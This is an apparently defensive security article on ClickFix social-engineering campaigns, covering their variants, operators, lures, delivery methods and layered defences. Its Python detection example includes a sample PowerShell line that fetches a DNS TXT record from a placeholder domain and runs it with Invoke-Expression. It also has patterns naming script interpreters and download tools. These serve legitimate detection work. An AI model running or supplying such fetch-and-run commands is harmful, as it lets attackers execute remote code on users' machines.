ClickFix Attacks: How They Work and How to Stop Them

The ClickFix Social Engineering ecosystem

Updated February 2026: Added ClickFix-as-a-Service (ErrTraffic), DNS TXT record delivery (KongTuke), CrashFix browser extension variant, ConsentFix OAuth hijacking, expanded detection guidance, and new data.

ClickFix attacks surged 517% in the first half of 2025, accounting for 8% of all blocked attacks (ESET, 2025). By late 2025, the technique had been packaged into turnkey attack platforms selling for $800 on criminal forums, with reported conversion rates near 60% (Hudson Rock, 2025). A single campaign alone has confirmed approximately 149,000 system infections through blockchain transaction tracking (Expel, 2026).

ClickFix is no longer a niche technique. It is an industrialised attack vector used by cybercriminals, nation-state groups, and now anyone with $800 and a compromised website.

How ClickFix Works

ClickFix manipulates users into executing malicious commands on their own machines (see Common ClickFix Lures below). The core mechanism exploits a gap between browser security and operating system execution that no single security tool covers completely.

The attack begins when a user visits a webpage displaying a fake verification prompt. These prompts mimic legitimate interfaces: browser error messages, document viewer issues, or human-verification challenges. The page looks convincing because attackers frequently inject them into real, compromised websites rather than building fake ones from scratch.

When the user interacts with the prompt, malicious code is silently loaded into their clipboard through JavaScript. The user is then socially engineered into opening a system execution dialogue using a keyboard shortcut and pasting the clipboard contents. That single action executes a script, typically PowerShell on Windows, that downloads and runs malware with the user's full privileges.

The entire attack takes seconds. The user has bypassed their own security controls without realising it.

macOS users face a parallel version. The same social engineering directs them to paste commands into Terminal instead of the Windows execution dialogue. Since May 2025, campaigns delivering Atomic macOS Stealer (AMOS) have targeted Mac users specifically.

Why Security Tools Struggle With ClickFix

Traditional security solutions are designed to detect malware being delivered and executed automatically. ClickFix inverts this model entirely: the user manually initiates every step.

Hudson Rock described this as the "air gap" between browser and operating system. The browser sees the user copying text to the clipboard, a legitimate action. The endpoint detection tool sees the user opening a system dialogue, also legitimate. When the user pastes and executes the code, it runs with their full privileges. Each individual action is normal. The combination is devastating.

Email security scans attachments for malicious code, but ClickFix campaigns often contain only a clean URL or HTML file that redirects to the attack page. The commands themselves are typically obfuscated one-liners that download the actual malware from attacker-controlled infrastructure. By the time the payload arrives, it is running in a user-initiated process that many tools treat as trusted activity.

This challenge compounds when attackers abuse legitimate Windows utilities. Recent campaigns use SyncAppvPublishingServer.vbs, a default Windows component modifiable only by TrustedInstaller, to proxy script execution through a trusted Microsoft binary (Blackpoint, 2026). As Marcus Hutchins noted: "Organisations and EDR are unlikely to outright block this."

For more on how attackers exploit user trust in AI interfaces through similar manipulation techniques, see our breakdown of prompt injection attacks.

The ClickFix Ecosystem: How It Evolved

ClickFix has moved from a criminal technique to an industrialised attack platform in under two years. Understanding this evolution matters because it explains why the volume is accelerating and why defences need to evolve with it.

Timeline

Date | Development | Source
March 2024 | First observed by Proofpoint (TA571, ClearFake) | Proofpoint
Mid 2024 | Adopted by cybercriminal groups | Multiple
Late 2024 | Nation-state adoption (Kimsuky, MuddyWater, APT28) | Proofpoint
H1 2025 | 517% surge, 8% of all blocked attacks | ESET
August 2025 | ClearFake infections tracked via blockchain | Expel
September 2025 | Social media creator targeting campaigns | Hunt.io
November 2025 | Steganography payload delivery observed | Malwarebytes
December 2025 | ErrTraffic commercialises ClickFix for $800 | Hudson Rock
December 2025 | ConsentFix targets OAuth tokens in-browser | Push Security
January 2026 | CrashFix weaponises Chrome extensions | Huntress
January 2026 | ClickFix builders priced $200-$1,500/month on forums | The Hacker News
January 2026 | SyncAppvPublishingServer.vbs LOLBin abuse | Blackpoint
February 2026 | DNS TXT record delivery (KongTuke) | Unit 42

ClickFix-as-a-Service: The ErrTraffic Platform

The biggest shift in the ClickFix landscape happened in December 2025 when Hudson Rock researchers documented ErrTraffic, a turnkey platform that industrialises ClickFix deployment.

ErrTraffic, sold by an actor calling themselves "LenAI" on Russian-language cybercrime forums, costs $800 as a one-time purchase. The platform provides a web dashboard that mimics commercial SaaS tools, complete with campaign statistics, payload management, and targeting configuration.

The technical implementation is straightforward but effective. An attacker injects a single line of JavaScript into a compromised website. The script fingerprints each visitor's operating system and browser, then delivers a tailored attack. Windows users receive infostealers like Lumma or Vidar. Android devices get the Cerberus banking trojan. macOS targets receive AMOS variants. Linux systems receive backdoors.

The platform's signature technique is what Censys researchers termed "GlitchFix": it visually corrupts the webpage using Zalgo characters to simulate a rendering failure, making the "fix" button feel necessary and urgent. Campaign data from active ErrTraffic panels showed conversion rates approaching 60% among users who interacted with the lure (Hudson Rock, 2025).

Most concerning is the self-sustaining infection loop. The infostealers deployed through ErrTraffic capture CMS credentials, WordPress admin logins, cPanel access, and similar administrative credentials. These stolen credentials are then used to inject ErrTraffic scripts into more websites, which infect their visitors, which steal more credentials. The cycle feeds itself.

ErrTraffic includes hardcoded geofencing that excludes CIS countries (Russia, Belarus, Kazakhstan), a reliable indicator of Russian-speaking threat actor origin. Censys identified that the platform has already evolved to version 3, adding native English translations, XOR-based payload obfuscation, and additional attack modes beyond the original GlitchFix approach.

ErrTraffic is not the only option on criminal forums. Multiple ClickFix builders are now advertised at prices ranging from $200 to $1,500 per month, with variants including FileFix, JackFix, CrashFix, and GlitchFix. Some are bundled into existing malware kits alongside LNK, JavaScript, and SVG file generators.

ClickFix Variants

The ClickFix ecosystem has fragmented into specialised variants, each targeting a different attack surface.

GlitchFix corrupts website visuals using Zalgo characters to simulate rendering failures. The garbled text creates immediate anxiety, making the "fix" prompt feel like the only solution. Deployed through ErrTraffic and similar platforms.

CrashFix weaponises browser extensions. Documented by Huntress in January 2026, this variant uses a malicious Chrome extension cloned from uBlock Origin Lite. Once installed, it displays a fake security warning claiming the browser "stopped abnormally," then intentionally crashes the browser through a denial-of-service loop to create panic. The extension disables right-click and developer tools to hinder analysis. When the user follows the "fix" instructions, the attack chain uses finger.exe, a legitimate Windows utility, to retrieve a next-stage payload that delivers ModeloRAT, a previously undocumented Python RAT. Notably, ModeloRAT is only deployed to domain-joined hosts, suggesting enterprise networks are the primary target (Huntress, 2026).

ConsentFix moves the entire attack into the browser. Documented by Push Security at Black Hat Europe in December 2025, this variant tricks users into pasting a localhost URL containing an OAuth authorisation code, giving attackers control of their Microsoft account without phishing credentials or bypassing MFA. The attack targets Azure CLI, a first-party application implicitly trusted across Entra ID tenants, which severely limits available defensive controls. Push Security found that 4 in 5 ClickFix attacks they intercepted arrived via Google Search rather than email, demonstrating the shift away from traditional phishing delivery (Push Security, 2025).

KongTuke retrieves payloads from DNS TXT records. Documented by Unit 42 in February 2026, this variant uses the PowerShell Resolve-DnsName cmdlet to query attacker-controlled domains through Google's public DNS (8.8.8.8), bypassing corporate DNS filtering entirely. The traffic appears as standard DNS lookups, evading URL filters and firewalls. KongTuke is also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124, and has connections to both Rhysida and Interlock ransomware operations (Unit 42, 2026).

Ready to build your own SIEM for detection? See our ELK Stack Security Monitoring Tutorial for hands-on implementation.

Who Uses ClickFix

ClickFix has been adopted across the entire threat spectrum, from lone criminals to nation-state intelligence services.

Cybercriminal campaigns deliver infostealers like Lumma Stealer, DarkGate, AsyncRAT, and Danabot. The Storm-1865 campaign impersonated Booking.com to target hospitality organisations across North America, Europe, and Asia. Healthcare professionals were targeted through a compromised physical therapy video site (HEP2go) that redirected users to ClickFix prompts. The CIS (Center for Internet Security) reported that ClickFix comprised over a third of all non-malware Albert Network Monitoring alerts in the first half of 2025.

Nation-state adoption began in late 2024. Proofpoint documented campaigns from four state-sponsored groups within a three-month window:

  • Kimsuky (North Korea) targeted think tanks researching North Korean policy, posing as a Japanese diplomat to build trust before delivering ClickFix payloads that installed QuasarRAT
  • MuddyWater (Iran) impersonated Microsoft security updates, timing phishing emails to coincide with Patch Tuesday to add legitimacy
  • APT28 (Russia) used fake Google Spreadsheet prompts with reCAPTCHA-style verification
  • UNK_RemoteRogue (Russia) targeted defence contractors through compromised Zimbra servers

When nation-state actors adopt a criminal technique this quickly, it works.

Social media creators are a newer target. Hunt.io documented campaigns using fake "verified badge" offers to lure content creators. The attack chains span 115 web pages and instruct victims to copy authentication tokens from browser cookies. Victims are told "do not log out for at least 24 hours" to keep the stolen tokens valid (Hunt.io, 2025).

Ransomware operators are connected through the KongTuke infrastructure, which has links to both Rhysida and Interlock ransomware groups via the TAG-124 traffic distribution system.

Common ClickFix Lures

Attackers continuously refine their social engineering. Current campaigns use these pretexts:

  • Fake human-verification prompts displaying instructions to run commands
  • Browser update prompts claiming the page cannot display without an update
  • Document viewer errors requiring a "plugin" to view PDF or Word files
  • Video conferencing issues impersonating Google Meet or Zoom with "fix your audio/video" prompts
  • Device registration claiming the user must register their device to access content
  • Social Security Administration notices about account issues (observed June 2025)
  • Fake verified badge offers targeting social media creators (Hunt.io, September 2025)
  • Google Calendar abuse delivering ClickFix lures through calendar invitations
  • Discord-themed lures (OBSCURE#BAT campaign)
  • Malvertising on streaming sites deploying ClickFix through video player prompts

The lures exploit urgency and familiarity. Users have been conditioned to trust "fix" buttons through years of legitimate software experiences. From 2010 to 2015, Microsoft's "Fix it" solutions trained users to click automated repair prompts. Windows Troubleshooters continue this pattern today. Attackers exploit that learned behaviour: when users see a familiar "fix" button, they follow the instructions without questioning whether the source is legitimate.

The name "ClickFix" itself, coined by Proofpoint researchers in 2024, reflects this pattern. Malicious prompts almost always include a button labelled "Fix", "How to fix", or "Fix it" because attackers know users have been trained to click them.

How ClickFix Payloads Are Delivered

ClickFix is not a single delivery mechanism. The ecosystem now includes multiple technical approaches, each designed to evade specific defensive controls.

Direct Script Execution

The original and most common approach. Malicious code is loaded into the victim's clipboard through JavaScript when they interact with a fake prompt. The user then pastes and executes it through a system dialogue. The commands are typically obfuscated one-liners that download the actual malware from attacker-controlled infrastructure.

DNS TXT Record Retrieval

The KongTuke variant, documented by Unit 42 in February 2026, retrieves payloads from DNS TXT records rather than web servers. The injected command uses the Resolve-DnsName PowerShell cmdlet to query attacker-controlled domains, forcing the query through Google's public DNS (8.8.8.8) to bypass corporate DNS filtering. This makes the attack traffic appear as standard DNS lookups, evading URL filters and most network monitoring tools.

Living Off the Land Binaries

Recent campaigns abuse legitimate Windows utilities to proxy malicious execution. SyncAppvPublishingServer.vbs, a default Windows component that can only be modified by TrustedInstaller, launches PowerShell execution through a trusted Microsoft binary. Campaigns also abuse mshta.exe for HTML Application execution and finger.exe for payload retrieval. These binaries are present on most Windows systems by default and are difficult to block without impacting legitimate operations.

Image Steganography

Documented by Malwarebytes in November 2025, this technique hides malware code in image pixel data, specifically within red channel colour values. The images appear completely normal to viewers and pass standard file inspection. A script extracts, decrypts, and reconstructs the malware in memory, leaving no file on disk for antivirus tools to scan.

Blockchain-Backed Infrastructure

The ClearFake campaign uses Binance Smart Chain (BNB) smart contracts to host and retrieve malicious JavaScript. Because blockchain transactions are immutable, the malicious smart contracts cannot be taken down by traditional abuse reporting. The threat actor can update payloads by modifying the smart contract data while keeping the same entry point, providing both persistence and operational agility. Expel's analysis of blockchain transaction data tracked approximately 149,199 unique system infections from August 2025 through January 2026 (Expel, 2026). Sekoia estimated at least 9,300 websites were infected with ClearFake as of March 2025, a number likely significantly higher today.

Defence Strategies

Blocking ClickFix requires layered controls. No single tool stops it because the attack distributes its steps across multiple trust boundaries.

Technical Controls

  • Restrict PowerShell execution for non-administrative users through Group Policy
  • Block or monitor WScript.exe and mshta.exe via AppLocker or Windows Defender Application Control
  • Deploy endpoint detection rules for AMSI bypass patterns commonly used in ClickFix payloads
  • Monitor for unusual PowerShell user agents in network traffic
  • Monitor for Resolve-DnsName combined with Invoke-Expression (iex) patterns, the signature of DNS TXT record retrieval
  • Flag SyncAppvPublishingServer.vbs launching PowerShell, a strong indicator of LOLBin abuse
  • Review Chrome extensions for cloned legitimate add-ons, particularly fake ad blockers
  • Block or monitor finger.exe network connections, which should be rare in most environments
  • Check the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) for suspicious entries indicating system dialogue abuse
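The indicators in the list above (and the KongTuke DNS TXT retrieval pattern described under How ClickFix Payloads Are Delivered) can be expressed as simple detection logic. The block below is an added example written for this article, not a vendor rule or the article's own code: it runs four checks over constructed process, network and registry events. The event field names (image, command_line, parent_command_line, key, value) are assumptions loosely modelled on Sysmon-style telemetry; map them to your own log schema.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real logs); field names are assumptions.
EVENTS = [
    # LOLBin abuse: wscript running SyncAppvPublishingServer.vbs spawns PowerShell
    {"event": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe <args redacted>",
     "parent_command_line": r"wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs <args redacted>"},
    # KongTuke-style DNS TXT retrieval fed into Invoke-Expression via 8.8.8.8
    {"event": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (Resolve-DnsName -Type TXT lookup.example.invalid -Server 8.8.8.8).Strings"',
     "parent_command_line": r"C:\Windows\explorer.exe"},
    # Benign admin use of Resolve-DnsName: no Invoke-Expression, must not fire
    {"event": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -Command Resolve-DnsName -Name intranet.example -Type A",
     "parent_command_line": r"C:\Windows\explorer.exe"},
    # finger.exe making an outbound connection (placeholder TEST-NET address)
    {"event": "network", "image": r"C:\Windows\System32\finger.exe",
     "dest_ip": "198.51.100.7", "dest_port": 79},
    # RunMRU entry showing a script interpreter typed into the Run dialogue
    {"event": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU",
     "value": "powershell -w hidden -ep bypass <redacted>\\1"},
    # Harmless RunMRU entry
    {"event": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU",
     "value": "notepad\\1"},
]

POWERSHELL = re.compile(r"(^|\\)(powershell|pwsh)\.exe$", re.I)
SYNCAPPV = re.compile(r"syncappvpublishingserver\.vbs", re.I)
RESOLVE_DNS = re.compile(r"resolve-dnsname", re.I)
IEX = re.compile(r"\biex\b|invoke-expression", re.I)
FINGER = re.compile(r"(^|\\)finger\.exe$", re.I)
RUNMRU = re.compile(r"\\Explorer\\RunMRU$", re.I)
RUNMRU_SUSPECT = re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil)\b", re.I)


@dataclass(frozen=True)
class Finding:
    index: int    # position of the event in the input list
    rule: str     # which indicator from the controls list fired
    detail: str   # the field value that matched, for the analyst


def evaluate(event: dict) -> list[str]:
    """Return the names of all rules that fire on a single event."""
    hits = []
    kind = event.get("event")
    if kind == "process":
        image = event.get("image", "")
        cmd = event.get("command_line", "")
        parent = event.get("parent_command_line", "")
        if POWERSHELL.search(image) and SYNCAPPV.search(parent):
            hits.append("syncappv_spawns_powershell")
        if POWERSHELL.search(image) and RESOLVE_DNS.search(cmd) and IEX.search(cmd):
            # Google's resolver is not required to fire; it only strengthens the hit
            hits.append("dns_txt_to_iex" + ("_via_8.8.8.8" if "8.8.8.8" in cmd else ""))
    elif kind == "network" and FINGER.search(event.get("image", "")):
        hits.append("finger_exe_network")
    elif kind == "registry":
        if RUNMRU.search(event.get("key", "")) and RUNMRU_SUSPECT.search(event.get("value", "")):
            hits.append("runmru_script_interpreter")
    return hits


def scan(events: list[dict]) -> list[Finding]:
    """Run every event through evaluate() and collect the findings in order."""
    findings = []
    for i, ev in enumerate(events):
        detail = ev.get("command_line") or ev.get("value") or ev.get("image", "")
        for rule in evaluate(ev):
            findings.append(Finding(i, rule, detail))
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"event {f.index}: {f.rule}: {f.detail[:80]}")
```

Tune RUNMRU_SUSPECT to your environment: administrators who routinely launch PowerShell from the Run dialogue will otherwise generate noise on the RunMRU check.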

Detection Rules and Resources

For organisations running ELK or similar SIEM platforms, Florian Roth (Nextron Systems) and other detection engineers have published Sigma rules specifically targeting ClickFix behaviour patterns. Additional detection resources include:

  • Unit 42 hunting guidance for KongTuke DNS TXT record patterns and IOCs
  • Expel ClearFake detection methodology using blockchain transaction analysis and Marcus Hutchins' ClearFake Payload Extractor
  • Darktrace detection patterns for EtherHiding activity and ClearFake-related blockchain interactions
  • Censys search queries for identifying active ErrTraffic panels (using the errtraffic_session cookie as a detection signature)
  • MITRE ATT&CK mappings: T1204.001 (User Execution: Malicious Link), T1059.001 (PowerShell), T1218 (System Binary Proxy Execution)

User Awareness

  • Legitimate verification prompts never require running system commands or pasting into system dialogues
  • No website needs access to the Windows Run dialogue or Terminal
  • Commands copied from websites should never be pasted into system tools
  • Social media platforms never ask you to paste commands to verify your account or receive a verification badge
  • If a website's text appears corrupted or garbled, close the tab. Do not interact with any "fix" buttons
  • When in doubt, report the prompt to your security team rather than attempting to fix it

The Bigger Picture

ClickFix is the most significant evolution in social engineering since traditional phishing. Its effectiveness comes from exploiting the fundamental trust model that security tools rely on: if the user initiates it, it must be legitimate.

The commercialisation of ClickFix through platforms like ErrTraffic signals that this technique has crossed the threshold from specialised capability to commodity tool. When attack infrastructure costs $800 and achieves 60% conversion rates, every threat actor with a compromised website becomes a potential distributor.

The variant explosion, from GlitchFix to ConsentFix to KongTuke, shows attackers are innovating faster than defenders can adjust. ConsentFix moving entirely into the browser is particularly concerning because it renders endpoint detection irrelevant. KongTuke using DNS TXT records for payload delivery bypasses network-layer URL filtering. Each variant addresses a specific defensive control, and together they cover most of the defensive surface.

For a broader view of how social engineering techniques fit into the current threat landscape, see our AI Security Threats guide.

Summary

ClickFix has evolved from a criminal technique first observed in March 2024 into an industrialised attack ecosystem spanning cybercriminal groups, nation-state intelligence services, and now anyone with $800 to spend on a commercial attack platform.

The defence requires action across multiple layers. Restrict script execution for standard users. Deploy detection rules for the specific execution patterns ClickFix relies on, including DNS TXT record retrieval, LOLBin abuse, and clipboard-to-execution chains. Train users that no legitimate service ever asks them to paste commands into system tools. Monitor for the specific indicators: RunMRU registry modifications, unusual Resolve-DnsName activity, SyncAppvPublishingServer.vbs spawning PowerShell, and finger.exe making network connections.

The technique will continue to evolve. Defenders who understand the ecosystem, not just the individual variants, will be better positioned to detect the next iteration before it arrives.


Last updated: February 2026

Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering attack that tricks users into executing malicious commands on their own computers. Attackers use fake verification prompts or error messages to convince victims to open a system execution dialogue and paste a malicious script, typically PowerShell, that downloads malware.

How does a ClickFix attack work?

The attack uses a fake prompt on a webpage that appears to require user verification or a fix. When the user interacts with it, malicious code is silently copied to their clipboard. The user is then instructed to open a system dialogue using a keyboard shortcut, paste the contents, and execute them. This runs malware with the user's full privileges.

What malware does ClickFix deliver?

ClickFix campaigns commonly deliver infostealers like Lumma Stealer, Vidar, DarkGate, and SnakeStealer, as well as remote access trojans including AsyncRAT, QuasarRAT, ModeloRAT, and NetSupport RAT. On macOS, AMOS (Atomic Stealer) is the primary payload. The specific malware depends on the threat actor and platform.

Can ClickFix target Mac users?

Yes. Campaigns targeting macOS users have been observed since May 2025, delivering Atomic macOS Stealer (AMOS). These attacks direct users to paste commands into Terminal instead of the Windows execution dialogue. The ErrTraffic platform supports multi-OS targeting including macOS and Linux.

What is ErrTraffic?

ErrTraffic is a ClickFix-as-a-Service platform sold on criminal forums for $800. Discovered by Hudson Rock in December 2025, it automates ClickFix deployment with multi-OS payload targeting, visual page corruption (GlitchFix), and campaign analytics showing conversion rates near 60%.

What is KongTuke?

KongTuke is a ClickFix variant documented by Unit 42 in February 2026 that retrieves malicious payloads from DNS TXT records instead of web servers, making the attack traffic appear as standard DNS lookups that bypass URL filters and firewalls. It is also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124.

What is ConsentFix?

ConsentFix is a browser-native ClickFix variant discovered by Push Security in December 2025. It tricks users into pasting a URL containing an OAuth authorisation code, giving attackers control of their Microsoft account without phishing passwords or bypassing MFA. The attack happens entirely within the browser, making endpoint detection irrelevant.

How many systems has ClickFix infected?

A single ClearFake campaign infected approximately 149,000 systems between August 2025 and January 2026, tracked through blockchain transaction data by Expel. At least 9,300 websites were confirmed infected with ClearFake as of March 2025 (Sekoia). The CIS reported ClickFix comprised over a third of all non-malware Albert Network Monitoring alerts in the first half of 2025.

How do I protect against ClickFix?

Restrict PowerShell and script execution for standard users, deploy endpoint detection rules for ClickFix patterns, monitor for DNS TXT record retrieval and LOLBin abuse, and train employees that legitimate verification prompts never require running system commands. If a website asks you to open a system dialogue or paste commands, close the page and report it.

Are nation-states using ClickFix?

Yes. Proofpoint documented ClickFix campaigns from Kimsuky (North Korea), MuddyWater (Iran), APT28 (Russia), and UNK_RemoteRogue (Russia) between late 2024 and early 2025, targeting government, defence, and think tank organisations. Microsoft reported that 47% of attacks in their telemetry started with ClickFix in the past year.



References and Sources

  1. ESET. (2025). H1 2025 Threat Report. ClickFix attacks increased 517%, accounting for 8% of blocked attacks.
  2. Proofpoint. (2025). Around the World in 90 Days: State-Sponsored Actors Try ClickFix. Documentation of nation-state adoption by Kimsuky, MuddyWater, APT28, and UNK_RemoteRogue.
  3. Proofpoint. (2024). ClickFix Social Engineering Technique Floods Threat Landscape. Initial documentation of ClickFix emergence and early campaigns by TA571 and ClearFake.
  4. Hudson Rock. (2025). The Industrialization of "ClickFix": Inside ErrTraffic. Analysis of the ErrTraffic v2 ClickFix-as-a-Service platform. December 28, 2025.
  5. Censys. (2026). ErrTraffic: Inside a GlitchFix Attack Panel. Source code breakdown, attack techniques, infrastructure mapping, and IOCs for ErrTraffic v2 and v3.
  6. Push Security. (2025). ConsentFix: Browser-Native ClickFix Hijacks OAuth Grants. Analysis of OAuth consent phishing via ClickFix-style prompts. December 11, 2025.
  7. Huntress. (2026). Dissecting CrashFix: KongTuke's New Toy. Analysis of malicious browser extension variant delivering ModeloRAT. January 2026.
  8. Unit 42 (Palo Alto Networks). (2026). KongTuke ClickFix Activity. Documentation of DNS TXT record payload delivery. February 3, 2026.
  9. Expel. (2026). ClearFake Gets More Evasive with New LOTL Techniques. Blockchain transaction analysis, infection tracking, and ClearFake Payload Extractor tool by Marcus Hutchins.
  10. Sekoia. (2025). ClearFake's New Widespread Variant: Increased Web3 Exploitation. Analysis of ClearFake infrastructure and 9,300+ infected websites. March 2025.
  11. Blackpoint. (2026). SyncAppvPublishingServer.vbs Abuse in ClickFix Campaigns. Living off the land binary abuse analysis. January 2026.
  12. Malwarebytes. (2025). Steganography in ClickFix Campaigns. Image-based payload delivery through pixel data. November 2025.
  13. Hunt.io. (2025). Social Media Creator Targeting via ClickFix. 115 web pages used in fake verified badge campaigns. September 2025.
  14. Microsoft Security. (2025). Think Before You Click(Fix). Technical analysis of ClickFix campaigns.
  15. Red Canary. (2025). Intelligence Insights: September 2025. KongTuke as top threat, tracked as 404 TDS/Chaya_002/LandUpdate808/TAG-124.
  16. Google/Mandiant. (2025). New Group on the Block: UNC5142 Leverages EtherHiding. ClearFake/CLEARSHORT framework analysis and BNB Smart Chain abuse.
  17. CIS (Center for Internet Security). (2025). ClickFix comprised over one-third of non-malware Albert Network Monitoring alerts in H1 2025.
  18. Darktrace. (2026). ClearFake: From Fake CAPTCHAs to Blockchain-Driven Payload Retrieval. Detection patterns for EtherHiding and ClearFake activity.